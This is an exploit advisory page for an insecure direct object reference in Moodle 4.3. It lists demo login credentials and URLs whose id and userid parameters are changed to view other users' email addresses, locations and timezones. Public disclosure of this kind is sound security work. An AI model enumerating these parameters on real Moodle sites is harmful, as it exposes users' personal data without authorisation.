Moodle 4.3 Insecure Direct Object Reference

2024.02.29

Credit: tmrswrr

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
# Date: 20/10/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3+
# Tested on: Linux 


Vulnerability Details
======================

Steps :

1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. In profile.php?id=11, modify the id Parameter to View User details,
Email address, Country, City/town, City, Timezone
3. Change the existing "id" value to another number 

https://school.moodledemo.net/user/profile.php?id=4
https://school.moodledemo.net/user/profile.php?id=5
https://school.moodledemo.net/user/profile.php?id=10
https://school.moodledemo.net/user/profile.php?id=50

https://school.moodledemo.net/blog/index.php?userid=3
https://school.moodledemo.net/blog/index.php?userid=14

https://school.moodledemo.net/mod/forum/user.php?id=53
https://school.moodledemo.net/mod/forum/user.php?id=50

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Moodle 4.3 Insecure Direct Object Reference

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.